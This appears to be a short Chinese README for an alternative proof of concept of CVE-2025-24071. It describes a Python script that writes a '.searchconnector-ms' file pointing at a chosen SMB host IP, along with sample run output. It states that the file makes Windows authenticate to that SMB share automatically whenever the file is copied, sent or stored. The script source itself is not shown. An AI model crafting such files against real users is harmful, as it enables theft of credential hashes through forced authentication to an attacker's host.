替代方案 CVE-2025-24071_PoC
原始代码 https://github.com/0x6rss/CVE-2025-24071_PoC
在使用另一个类似扩展进行测试时,我尝试了“.searchconnector-ms”,并使用了相同的结构,但第一个PoC的缺陷也同样存在。
python poc2.py
请输入共享资源的IP地址: 192.168.88.33
已创建文件 'network_share.searchconnector-ms',使用IP 192.168.88.33。
并且当发送、复制或存储该文件时,会自动对SMB资源进行身份验证。
//Vmware 在进行测试时,仅通过将文件复制到虚拟机,它就会对SMB资源进行身份验证。
https://github.com/user-attachments/assets/2b71cc32-5010-4840-bf13-bd134c305d12